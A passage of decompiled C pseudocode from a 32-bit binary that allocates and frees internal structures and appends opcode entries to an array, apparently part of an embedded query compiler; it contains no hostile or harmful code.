				signed int _t2269;
				signed int _t2270;
				void* _t2271;
				void* _t2272;
				void* _t2273;
				void* _t2274;
				void* _t2275;
				void* _t2276;
				void* _t2277;
				void* _t2278;
				void* _t2279;
				void* _t2280;
				void* _t2281;

				_v8 =  *0x481f80 ^ _t2270;
				_t1986 = _a4;
				_t1979 = _t1986[3];
				_t2197 =  *_t1986;
				_v64 = _a8;
				_v60 = _t1986;
				_v120 = _a12;
				_v124 = 0;
				_v56 = 0;
				_v112 = _t2197;
				_v72 = _t1979;
				_v96 = E00FDD1A7(_t1979);
				_t1519 = E00FDD1A7(_t1979);
				_t1987 = _v64;
				_v116 = _t1519;
				_t2222 =  *(_t1987 + 4) & 0x000000ff;
				_t2092 =  *(_t1987 + 0x18);
				_v104 =  *((intOrPtr*)(_t1987 + 0x1c));
				_t1521 =  *_t2092;
				_t2272 = _t2271 + 8;
				_v100 = _t2222;
				_v68 = _t2092;
				_v84 = _t1521;
				if(_t2222 == 0x71) {
					L32:
					_t2223 = _t1521 * 4;
					if(_t2197 == 0) {
						L43:
						if(_t2223 - 1 > 0x7ffffefe) {
							_t1988 = 0;
							_v76 = 0;
							goto L55;
						} else {
							if( *0x481808 == 0) {
								_t1946 =  *0x481820(_t2223);
								_t1988 = _t1946;
								_v76 = _t1946;
								L51:
								_t2272 = _t2272 + 4;
							} else {
								_t1947 =  *0x481910;
								if(_t1947 != 0) {
									 *0x481850(_t1947);
									_t2272 = _t2272 + 4;
								}
								E00FAB537(_t2092, _t2223,  &_v48);
								_t1950 =  *0x481910;
								_t2272 = _t2272 + 8;
								if(_t1950 == 0) {
									_t1988 = _v48;
									_v76 = _t1988;
								} else {
									 *0x481858(_t1950);
									_t1988 = _v48;
									_v76 = _t1988;
									goto L51;
								}
							}
							if(_t1988 != 0) {
								goto L58;
							} else {
								L55:
								if(_t2197 != 0) {
									 *((char*)(_t2197 + 0x1e)) = 1;
								}
								goto L57;
							}
						}
						goto L187;
					} else {
						if( *((char*)(_t2197 + 0x1e)) == 0) {
							if( *((char*)(_t2197 + 0xda)) == 0 || _t2223 > ( *(_t2197 + 0xd8) & 0x0000ffff)) {
								goto L43;
							} else {
								_t1988 =  *(_t2197 + 0xe4);
								_v76 = _t1988;
								if(_t1988 == 0) {
									goto L43;
								} else {
									 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) + 1;
									 *(_t2197 + 0xe4) =  *_t1988;
									_t1955 =  *((intOrPtr*)(_t2197 + 0xdc));
									if(_t1955 >  *((intOrPtr*)(_t2197 + 0xe0))) {
										 *((intOrPtr*)(_t2197 + 0xe0)) = _t1955;
									}
									L57:
									if(_t1988 == 0) {
										goto L35;
									} else {
										L58:
										_t2264 = _v84;
										_t2189 = _v68[3];
										_t2080 = 0;
										if(_t2264 > 0) {
											_t1984 = _v76;
											_t2194 = _t2189 + 0xe;
											do {
												 *((intOrPtr*)(_t1984 + _t2080 * 4)) = ( *_t2194 & 0x0000ffff) - 1;
												_t2080 = _t2080 + 1;
												_t2194 =  &(_t2194[0xa]);
											} while (_t2080 < _t2264);
											_t1979 = _v72;
										}
										_t2266 = _t2264 + _t2264 * 4 + 0x10;
										if(_t2197 == 0) {
											L69:
											if(_t2266 - 1 > 0x7ffffefe) {
												_t2190 = 0;
												_v92 = 0;
												goto L81;
											} else {
												if( *0x481808 == 0) {
													_t1934 =  *0x481820(_t2266);
													_t2190 = _t1934;
													_v92 = _t1934;
													goto L77;
												} else {
													_t1935 =  *0x481910;
													if(_t1935 != 0) {
														 *0x481850(_t1935);
														_t2272 = _t2272 + 4;
													}
													E00FAB537(_t2189, _t2266,  &_v48);
													_t1938 =  *0x481910;
													_t2272 = _t2272 + 8;
													if(_t1938 == 0) {
														_t2190 = _v48;
														_v92 = _t2190;
													} else {
														 *0x481858(_t1938);
														_t2190 = _v48;
														_v92 = _t2190;
														L77:
														_t2272 = _t2272 + 4;
													}
												}
												if(_t2190 != 0) {
													goto L84;
												} else {
													L81:
													if(_t2197 != 0) {
														 *((char*)(_t2197 + 0x1e)) = 1;
													}
													goto L83;
												}
											}
										} else {
											if( *((char*)(_t2197 + 0x1e)) != 0) {
												goto L35;
											} else {
												if( *((char*)(_t2197 + 0xda)) == 0 || _t2266 > ( *(_t2197 + 0xd8) & 0x0000ffff)) {
													goto L69;
												} else {
													_t2189 =  *(_t2197 + 0xe4);
													_v92 = _t2189;
													if(_t2189 == 0) {
														goto L69;
													} else {
														 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) + 1;
														 *(_t2197 + 0xe4) =  *_t2189;
														_t1943 =  *((intOrPtr*)(_t2197 + 0xdc));
														if(_t1943 >  *((intOrPtr*)(_t2197 + 0xe0))) {
															 *((intOrPtr*)(_t2197 + 0xe0)) = _t1943;
														}
														L83:
														if(_t2190 != 0) {
															L84:
															_t2081 = _v84;
															 *((short*)(_t2190 + 6)) = _t2081;
															 *((intOrPtr*)(_t2190 + 8)) = _t2190 + (_t2081 + 3) * 4;
															 *((char*)(_t2190 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t2197 + 8)) + 0xc)) + 0x39));
															_t2191 = 0;
															_v48 = 0;
															if(_t2081 > 0) {
																_t2221 = 0;
																_t1983 = _v92 + 0xc;
																_t2082 = 0x100;
																do {
																	_t2267 =  *((intOrPtr*)(_t2221 + _v68[3]));
																	if(( *(_t2267 + 2) & _t2082) == 0) {
																		_t2083 =  *(_v76 + _t2191 * 4);
																		_v80 = _t2083;
																		_t1928 =  *((intOrPtr*)(_v64 + 0x1c));
																		if( *((intOrPtr*)(_v64 + 0x1c)) == 0) {
																			_t1929 = 0;
																			goto L92;
																		} else {
																			_t1929 = E00FAC337(_v60, _t1928, _t2083);
																			_t2272 = _t2272 + 0xc;
																			if(_t1929 == 0) {
																				_t2083 = _v80;
																				L92:
																				_t2193 =  *_v64;
																				if(_t2083 <  *((intOrPtr*)( *_v64))) {
																					_t1929 = E00FC25D7(_v60,  *((intOrPtr*)( *((intOrPtr*)(_t2193 + 0xc)) + (_t2083 + _t2083 * 4) * 4)));
																					_t2272 = _t2272 + 8;
																				}
																			}
																		}
																		_t2191 = _v48;
																		 *(_t2267 + 2) =  *(_t2267 + 2) | 0x00000100;
																		 *((intOrPtr*)(_t2267 + 0x14)) = _t1929;
																	} else {
																		_t1929 =  *((intOrPtr*)(_t2267 + 0x14));
																	}
																	 *_t1983 = _t1929;
																	_t2191 = _t2191 + 1;
																	 *((char*)(_t2191 +  *((intOrPtr*)(_v92 + 8)) - 1)) =  *((intOrPtr*)(_t2221 + _v68[3] + 0xc));
																	_t1983 = _t1983 + 4;
																	_t2221 = _t2221 + 0x14;
																	_v48 = _t2191;
																	_t2082 = 0x100;
																} while (_t2191 < _v84);
																_t1979 = _v72;
																_t2197 = _v112;
															}
														}
														goto L36;
													}
												}
											}
										}
									}
								}
							}
							L187:
							_t2228 =  *(_t2224 + 0x28);
							if(_t2228 != 0) {
								if(( *(_t2228 + 2) & 0x00004000) == 0) {
									E00FC27E7(_t2197,  *((intOrPtr*)(_t2228 + 8)));
									E00FC27E7(_t2197,  *((intOrPtr*)(_t2228 + 0xc)));
									_t2275 = _t2275 + 0x10;
									if(( *(_t2228 + 2) & 0x00002000) == 0 && ( *(_t2228 + 0x22) & 0x00000001) != 0) {
										_t2066 =  *(_t2228 + 4);
										if(_t2197 == 0 || _t2066 == 0 || _t2066 <  *((intOrPtr*)(_t2197 + 0xe8)) || _t2066 >=  *((intOrPtr*)(_t2197 + 0xec))) {
											E00F97247(_t2066);
											_t2275 = _t2275 + 4;
										} else {
											 *_t2066 =  *(_t2197 + 0xe4);
											 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) - 1;
											 *(_t2197 + 0xe4) = _t2066;
										}
									}
									if(( *(_t2228 + 2) & 0x00001000) == 0) {
										E00FC3017(_t2197,  *((intOrPtr*)(_t2228 + 0x10)));
										_t2275 = _t2275 + 8;
									} else {
										_t1835 =  *((intOrPtr*)(_t2228 + 0x10));
										_v44 = _t1835;
										if(_t1835 != 0) {
											E00FC3017(_t2197,  *_t1835);
											E00FD13B7(_t2197,  *((intOrPtr*)(_v44 + 8)));
											E00FC27E7(_t2197,  *((intOrPtr*)(_v44 + 0xc)));
											E00FC3017(_t2197,  *((intOrPtr*)(_v44 + 0x10)));
											E00FC27E7(_t2197,  *((intOrPtr*)(_v44 + 0x14)));
											E00FC3017(_t2197,  *((intOrPtr*)(_v44 + 0x18)));
											E00FD0DB7(_t2197,  *((intOrPtr*)(_v44 + 0x1c)));
											E00FC27E7(_t2197,  *((intOrPtr*)(_v44 + 0x28)));
											E00FC27E7(_t2197,  *((intOrPtr*)(_v44 + 0x2c)));
											_t2065 = _v44;
											_t2275 = _t2275 + 0x48;
											if(_t2197 == 0 || _t2065 <  *((intOrPtr*)(_t2197 + 0xe8)) || _t2065 >=  *((intOrPtr*)(_t2197 + 0xec))) {
												E00F97247(_t2065);
												_t2275 = _t2275 + 4;
											} else {
												 *_t2065 =  *(_t2197 + 0xe4);
												 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) - 1;
												 *(_t2197 + 0xe4) = _t2065;
											}
										}
									}
								}
								if(( *(_t2228 + 2) & 0x00008000) == 0) {
									if(_t2197 == 0 || _t2228 <  *((intOrPtr*)(_t2197 + 0xe8)) || _t2228 >=  *((intOrPtr*)(_t2197 + 0xec))) {
										if( *0x481808 == 0) {
											 *0x481824(_t2228);
											goto L217;
										} else {
											_t1820 =  *0x481910;
											if(_t1820 != 0) {
												 *0x481850(_t1820);
												_t2275 = _t2275 + 4;
											}
											_t2064 =  *0x487020 +  ~( *0x48182c(_t2228));
											_t1823 =  *0x487044;
											_t1824 =  >  ? _t2064 : _t1823;
											 *0x487020 = _t2064;
											 *0x487044 =  >  ? _t2064 : _t1823;
											 *0x481824(_t2228);
											_t1826 =  *0x481910;
											_t2275 = _t2275 + 8;
											if(_t1826 != 0) {
												 *0x481858(_t1826);
												L217:
												_t2275 = _t2275 + 4;
											}
										}
									} else {
										 *_t2228 =  *(_t2197 + 0xe4);
										 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) - 1;
										 *(_t2197 + 0xe4) = _t2228;
									}
								}
							}
							_t1541 = _v64;
							_t2229 =  *(_t1541 + 0x2c);
							 *(_t1541 + 0x28) = 0;
							if(_t2229 != 0) {
								if(( *(_t2229 + 2) & 0x00004000) == 0) {
									E00FC27E7(_t2197,  *((intOrPtr*)(_t2229 + 8)));
									E00FC27E7(_t2197,  *((intOrPtr*)(_t2229 + 0xc)));
									_t2275 = _t2275 + 0x10;
									if(( *(_t2229 + 2) & 0x00002000) == 0 && ( *(_t2229 + 0x22) & 0x00000001) != 0) {
										_t2062 =  *(_t2229 + 4);
										if(_t2197 == 0 || _t2062 == 0 || _t2062 <  *((intOrPtr*)(_t2197 + 0xe8)) || _t2062 >=  *((intOrPtr*)(_t2197 + 0xec))) {
											E00F97247(_t2062);
											_t2275 = _t2275 + 4;
										} else {
											 *_t2062 =  *(_t2197 + 0xe4);
											 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) - 1;
											 *(_t2197 + 0xe4) = _t2062;
										}
									}
									if(( *(_t2229 + 2) & 0x00001000) == 0) {
										E00FC3017(_t2197,  *((intOrPtr*)(_t2229 + 0x10)));
										_t2275 = _t2275 + 8;
									} else {
										_t1796 =  *((intOrPtr*)(_t2229 + 0x10));
										_v44 = _t1796;
										if(_t1796 != 0) {
											E00FC3017(_t2197,  *_t1796);
											E00FD13B7(_t2197,  *((intOrPtr*)(_v44 + 8)));
											E00FC27E7(_t2197,  *((intOrPtr*)(_v44 + 0xc)));
											E00FC3017(_t2197,  *((intOrPtr*)(_v44 + 0x10)));
											E00FC27E7(_t2197,  *((intOrPtr*)(_v44 + 0x14)));
											E00FC3017(_t2197,  *((intOrPtr*)(_v44 + 0x18)));
											E00FD0DB7(_t2197,  *((intOrPtr*)(_v44 + 0x1c)));
											E00FC27E7(_t2197,  *((intOrPtr*)(_v44 + 0x28)));
											E00FC27E7(_t2197,  *((intOrPtr*)(_v44 + 0x2c)));
											_t2061 = _v44;
											_t2275 = _t2275 + 0x48;
											if(_t2197 == 0 || _t2061 <  *((intOrPtr*)(_t2197 + 0xe8)) || _t2061 >=  *((intOrPtr*)(_t2197 + 0xec))) {
												E00F97247(_t2061);
												_t2275 = _t2275 + 4;
											} else {
												 *_t2061 =  *(_t2197 + 0xe4);
												 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) - 1;
												 *(_t2197 + 0xe4) = _t2061;
											}
										}
									}
								}
								if(( *(_t2229 + 2) & 0x00008000) == 0) {
									if(_t2197 == 0 || _t2229 <  *((intOrPtr*)(_t2197 + 0xe8)) || _t2229 >=  *((intOrPtr*)(_t2197 + 0xec))) {
										if( *0x481808 == 0) {
											 *0x481824(_t2229);
											goto L247;
										} else {
											_t1781 =  *0x481910;
											if(_t1781 != 0) {
												 *0x481850(_t1781);
												_t2275 = _t2275 + 4;
											}
											_t2060 =  *0x487020 +  ~( *0x48182c(_t2229));
											_t1784 =  *0x487044;
											_t1785 =  >  ? _t2060 : _t1784;
											 *0x487020 = _t2060;
											 *0x487044 =  >  ? _t2060 : _t1784;
											 *0x481824(_t2229);
											_t1787 =  *0x481910;
											_t2275 = _t2275 + 8;
											if(_t1787 != 0) {
												 *0x481858(_t1787);
												L247:
												_t2275 = _t2275 + 4;
											}
										}
									} else {
										 *_t2229 =  *(_t2197 + 0xe4);
										 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) - 1;
										 *(_t2197 + 0xe4) = _t2229;
									}
								}
							}
							_t2198 = _v60;
							 *(_v64 + 0x2c) = 0;
							 *((intOrPtr*)(_t2198 + 0x48)) =  *((intOrPtr*)(_t2198 + 0x48)) + 1;
							_t1992 =  *((intOrPtr*)(_t2198 + 0x48));
							_v40 = 0xa;
							_t534 = _t1992 + 2; // 0x2
							_t2095 = _t534;
							_v36 = _t1992;
							_t536 = _t2095 + 3; // 0x5
							_t1543 = _t536;
							 *((intOrPtr*)(_t2198 + 0x48)) = _t1543;
							_v32 = 0;
							_v28 = 0;
							_v24 = 0xa;
							_v20 = _t2095;
							_v16 = 0;
							_v12 = 0;
							_t2230 =  *(_t1979 + 0xc);
							_v108 = _t1543;
							_t1544 =  *(_t1979 + 0x10);
							_v88 = _t1992;
							_v44 = _t2095;
							_v48 = _t2230;
							if(_t1544 > _t2230) {
								L259:
								_t1545 =  *((intOrPtr*)(_t1979 + 0x14));
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1993 = _t2230 + _t2230 * 4;
								 *((short*)(_t1545 + _t1993 * 4)) = 0x60;
								 *((char*)(_t1545 + 3 + _t1993 * 4)) = 0;
								 *(_t1545 + 4 + _t1993 * 4) = 0;
								 *(_t1545 + 8 + _t1993 * 4) = 0;
								 *(_t1545 + 0xc + _t1993 * 4) = 0;
								 *(_t1545 + 0x10 + _t1993 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1544 == 0) {
									_t1770 = 0x33;
								} else {
									_t1770 = _t1544 + _t1544;
								}
								_t2258 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1770 + _t1770 * 4 << 2);
								_t2275 = _t2275 + 0xc;
								if(_t2258 == 0) {
									_v48 = 1;
								} else {
									_t1774 =  *_t1979;
									if(_t1774 == 0 || _t2258 <  *((intOrPtr*)(_t1774 + 0xe8)) || _t2258 >=  *((intOrPtr*)(_t1774 + 0xec))) {
										_t1775 =  *0x48182c(_t2258);
										_t2275 = _t2275 + 4;
										_t2058 = _t1775;
									} else {
										_t2058 =  *(_t1774 + 0xd8) & 0x0000ffff;
									}
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2258;
									_t2230 = _v48;
									 *(_t1979 + 0x10) = 0xcccccccd * _t2058 >> 0x20 >> 4;
									goto L259;
								}
							}
							_v132 =  *(_t1979 + 0xc);
							 *((intOrPtr*)(_v104 + 0x30)) = _v52;
							E00FCFAC7(_t2198, _v104,  &_v40);
							_t2199 =  *(_t1979 + 0xc);
							_t1550 =  *(_t1979 + 0x10);
							_t2276 = _t2275 + 0xc;
							if(_t1550 > _t2199) {
								L272:
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1551 =  *((intOrPtr*)(_t1979 + 0x14));
								_t1995 = _t2199 + _t2199 * 4;
								 *((short*)(_t1551 + _t1995 * 4)) = 0x30;
								 *((char*)(_t1551 + 3 + _t1995 * 4)) = 0;
								 *(_t1551 + 4 + _t1995 * 4) = 1;
								 *((intOrPtr*)(_t1551 + 8 + _t1995 * 4)) = _v88 + 1;
								 *(_t1551 + 0xc + _t1995 * 4) = 0;
								 *(_t1551 + 0x10 + _t1995 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1550 == 0) {
									_t1762 = 0x33;
								} else {
									_t1762 = _t1550 + _t1550;
								}
								_t2257 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1762 + _t1762 * 4 << 2);
								_t2276 = _t2276 + 0xc;
								if(_t2257 != 0) {
									_t1766 =  *_t1979;
									if(_t1766 == 0 || _t2257 <  *((intOrPtr*)(_t1766 + 0xe8)) || _t2257 >=  *((intOrPtr*)(_t1766 + 0xec))) {
										_t1767 =  *0x48182c(_t2257);
										_t2276 = _t2276 + 4;
										_t2057 = _t1767;
									} else {
										_t2057 =  *(_t1766 + 0xd8) & 0x0000ffff;
									}
									 *(_t1979 + 0x10) = 0xcccccccd * _t2057 >> 0x20 >> 4;
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2257;
									goto L272;
								}
							}
							_t2200 =  *(_t1979 + 0xc);
							_t1552 =  *(_t1979 + 0x10);
							if(_t1552 > _t2200) {
								L284:
								_t1553 =  *((intOrPtr*)(_t1979 + 0x14));
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1996 = _t2200 + _t2200 * 4;
								 *((short*)(_t1553 + _t1996 * 4)) = 0x3c;
								 *((char*)(_t1553 + 3 + _t1996 * 4)) = 0;
								 *((intOrPtr*)(_t1553 + 4 + _t1996 * 4)) = _v88;
								 *(_t1553 + 8 + _t1996 * 4) = 0;
								 *(_t1553 + 0xc + _t1996 * 4) = 0;
								 *(_t1553 + 0x10 + _t1996 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1552 == 0) {
									_t1754 = 0x33;
								} else {
									_t1754 = _t1552 + _t1552;
								}
								_t2256 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1754 + _t1754 * 4 << 2);
								_t2276 = _t2276 + 0xc;
								if(_t2256 != 0) {
									_t1758 =  *_t1979;
									if(_t1758 == 0 || _t2256 <  *((intOrPtr*)(_t1758 + 0xe8)) || _t2256 >=  *((intOrPtr*)(_t1758 + 0xec))) {
										_t1759 =  *0x48182c(_t2256);
										_t2276 = _t2276 + 4;
										_t2056 = _t1759;
									} else {
										_t2056 =  *(_t1758 + 0xd8) & 0x0000ffff;
									}
									 *(_t1979 + 0x10) = 0xcccccccd * _t2056 >> 0x20 >> 4;
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2256;
									goto L284;
								}
							}
							_t1997 = _v64;
							_v128 =  *(_t1979 + 0xc);
							 *((intOrPtr*)(_t1997 + 0x30)) = _v72;
							 *(_t1997 + 0x34) = 0;
							E00FCFAC7(_v60, _t1997,  &_v24);
							_t1558 = _v64;
							_t2277 = _t2276 + 0xc;
							 *((intOrPtr*)(_t1558 + 0x30)) =  *((intOrPtr*)(_t1997 + 0x30));
							 *(_t1558 + 0x34) =  *(_t1997 + 0x34);
							_t2202 =  *(_t1979 + 0xc);
							_t1559 =  *(_t1979 + 0x10);
							if(_t1559 > _t2202) {
								L296:
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1560 =  *((intOrPtr*)(_t1979 + 0x14));
								_t1998 = _t2202 + _t2202 * 4;
								 *((short*)(_t1560 + _t1998 * 4)) = 0x30;
								 *((char*)(_t1560 + 3 + _t1998 * 4)) = 0;
								 *(_t1560 + 4 + _t1998 * 4) = 1;
								 *((intOrPtr*)(_t1560 + 8 + _t1998 * 4)) = _v44 + 1;
								 *(_t1560 + 0xc + _t1998 * 4) = 0;
								 *(_t1560 + 0x10 + _t1998 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1559 == 0) {
									_t1746 = 0x33;
								} else {
									_t1746 = _t1559 + _t1559;
								}
								_t2255 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1746 + _t1746 * 4 << 2);
								_t2277 = _t2277 + 0xc;
								if(_t2255 != 0) {
									_t1750 =  *_t1979;
									if(_t1750 == 0 || _t2255 <  *((intOrPtr*)(_t1750 + 0xe8)) || _t2255 >=  *((intOrPtr*)(_t1750 + 0xec))) {
										_t1751 =  *0x48182c(_t2255);
										_t2277 = _t2277 + 4;
										_t2055 = _t1751;
									} else {
										_t2055 =  *(_t1750 + 0xd8) & 0x0000ffff;
									}
									 *(_t1979 + 0x10) = 0xcccccccd * _t2055 >> 0x20 >> 4;
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2255;
									goto L296;
								}
							}
							_t2203 =  *(_t1979 + 0xc);
							_t1561 =  *(_t1979 + 0x10);
							if(_t1561 > _t2203) {
								L308:
								_t1562 =  *((intOrPtr*)(_t1979 + 0x14));
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t2101 = _v44;
								_t1999 = _t2203 + _t2203 * 4;
								 *((short*)(_t1562 + _t1999 * 4)) = 0x3c;
								 *((char*)(_t1562 + 3 + _t1999 * 4)) = 0;
								 *((intOrPtr*)(_t1562 + 4 + _t1999 * 4)) = _v44;
								 *(_t1562 + 8 + _t1999 * 4) = 0;
								 *(_t1562 + 0xc + _t1999 * 4) = 0;
								 *(_t1562 + 0x10 + _t1999 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1561 == 0) {
									_t1738 = 0x33;
								} else {
									_t1738 = _t1561 + _t1561;
								}
								_t2254 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1738 + _t1738 * 4 << 2);
								_t2277 = _t2277 + 0xc;
								if(_t2254 == 0) {
									_t2101 = _v44;
								} else {
									_t1742 =  *_t1979;
									if(_t1742 == 0 || _t2254 <  *((intOrPtr*)(_t1742 + 0xe8)) || _t2254 >=  *((intOrPtr*)(_t1742 + 0xec))) {
										_t1743 =  *0x48182c(_t2254);
										_t2277 = _t2277 + 4;
										_t2054 = _t1743;
									} else {
										_t2054 =  *(_t1742 + 0xd8) & 0x0000ffff;
									}
									 *(_t1979 + 0x10) = 0xcccccccd * _t2054 >> 0x20 >> 4;
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2254;
									goto L308;
								}
							}
							_t2232 = _v56;
							_t2204 = _v68;
							_v80 = E00FA8497(_v60, _v64,  &_v40, _v120, _t2101 + 2, _v68, _v56, 0xfffffff0, _v96);
							_t1566 = _v100;
							_t2278 = _t2277 + 0x24;
							if(_t1566 == 0x71 || _t1566 == 0x70) {
								_v124 = E00FA8497(_v60, _v64,  &_v24, _v120, _v108, _t2204, _t2232, 0xffffffef, _v96);
								_t1566 = _v100;
								_t2278 = _t2278 + 0x24;
							}
							if(_t1566 == 0x72 || _t1566 == 0x73) {
								_t2205 =  *(_t1979 + 0xc);
								_t1569 =  *(_t1979 + 0x10);
								_v56 = _t2205;
								if(_t1569 > _t2205) {
									L375:
									_t1570 =  *((intOrPtr*)(_t1979 + 0x14));
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t2000 = _t2205 + _t2205 * 4;
									 *((short*)(_t1570 + _t2000 * 4)) = 0x60;
									 *((char*)(_t1570 + 3 + _t2000 * 4)) = 0;
									 *(_t1570 + 4 + _t2000 * 4) = 0;
									 *((intOrPtr*)(_t1570 + 8 + _t2000 * 4)) = _v96;
									 *(_t1570 + 0xc + _t2000 * 4) = 0;
									 *(_t1570 + 0x10 + _t2000 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1569 == 0) {
										_t1695 = 0x33;
									} else {
										_t1695 = _t1569 + _t1569;
									}
									_t2249 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1695 + _t1695 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2249 == 0) {
										_t2205 = 1;
										_v56 = 1;
									} else {
										_t2040 =  *_t1979;
										if(_t2040 == 0 || _t2249 <  *((intOrPtr*)(_t2040 + 0xe8)) || _t2249 >=  *((intOrPtr*)(_t2040 + 0xec))) {
											_t1699 =  *0x48182c(_t2249);
											_t2278 = _t2278 + 4;
											_t2041 = _t1699;
										} else {
											_t2041 =  *(_t2040 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2041 >> 0x20 >> 4;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2249;
										goto L375;
									}
								}
							} else {
								_t2214 =  *(_t1979 + 0xc);
								_t1702 =  *(_t1979 + 0x10);
								_v56 = _t2214;
								if(_t1702 > _t2214) {
									L326:
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t1703 =  *((intOrPtr*)(_t1979 + 0x14));
									_t2042 = _t2214 + _t2214 * 4;
									 *((intOrPtr*)(_t1703 + 4 + _t2042 * 4)) = _v44 + 1;
									 *((short*)(_t1703 + _t2042 * 4)) = 0xb;
									 *((char*)(_t1703 + 3 + _t2042 * 4)) = 0;
									 *((intOrPtr*)(_t1703 + 8 + _t2042 * 4)) = _v96;
									 *(_t1703 + 0xc + _t2042 * 4) = 0;
									 *(_t1703 + 0x10 + _t2042 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1702 == 0) {
										_t1731 = 0x33;
									} else {
										_t1731 = _t1702 + _t1702;
									}
									_t2253 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1731 + _t1731 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2253 == 0) {
										_v56 = 1;
									} else {
										_t2052 =  *_t1979;
										if(_t2052 == 0 || _t2253 <  *((intOrPtr*)(_t2052 + 0xe8)) || _t2253 >=  *((intOrPtr*)(_t2052 + 0xec))) {
											_t1735 =  *0x48182c(_t2253);
											_t2278 = _t2278 + 4;
											_t2053 = _t1735;
										} else {
											_t2053 =  *(_t2052 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2053 >> 0x20 >> 4;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2253;
										goto L326;
									}
								}
								_t2215 =  *(_t1979 + 0xc);
								_t1704 =  *(_t1979 + 0x10);
								if(_t1704 > _t2215) {
									L339:
									_t1705 =  *((intOrPtr*)(_t1979 + 0x14));
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t2043 = _t2215 + _t2215 * 4;
									 *((intOrPtr*)(_t1705 + 4 + _t2043 * 4)) = _v108;
									 *((short*)(_t1705 + _t2043 * 4)) = 0x2f;
									 *((char*)(_t1705 + 3 + _t2043 * 4)) = 0;
									 *((intOrPtr*)(_t1705 + 8 + _t2043 * 4)) = _v124;
									 *(_t1705 + 0xc + _t2043 * 4) = 0;
									 *(_t1705 + 0x10 + _t2043 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1704 == 0) {
										_t1724 = 0x33;
									} else {
										_t1724 = _t1704 + _t1704;
									}
									_t2252 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1724 + _t1724 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2252 != 0) {
										_t2050 =  *_t1979;
										if(_t2050 == 0 || _t2252 <  *((intOrPtr*)(_t2050 + 0xe8)) || _t2252 >=  *((intOrPtr*)(_t2050 + 0xec))) {
											_t1728 =  *0x48182c(_t2252);
											_t2278 = _t2278 + 4;
											_t2051 = _t1728;
										} else {
											_t2051 =  *(_t2050 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2051 >> 0x20 >> 4;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2252;
										goto L339;
									}
								}
								_t2216 =  *(_t1979 + 0xc);
								_t1706 =  *(_t1979 + 0x10);
								if(_t1706 > _t2216) {
									L351:
									_t1707 =  *((intOrPtr*)(_t1979 + 0x14));
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t2044 = _t2216 + _t2216 * 4;
									 *((short*)(_t1707 + _t2044 * 4)) = 0x3c;
									 *((char*)(_t1707 + 3 + _t2044 * 4)) = 0;
									 *((intOrPtr*)(_t1707 + 4 + _t2044 * 4)) = _v44;
									 *(_t1707 + 8 + _t2044 * 4) = 0;
									 *(_t1707 + 0xc + _t2044 * 4) = 0;
									 *(_t1707 + 0x10 + _t2044 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1706 == 0) {
										_t1717 = 0x33;
									} else {
										_t1717 = _t1706 + _t1706;
									}
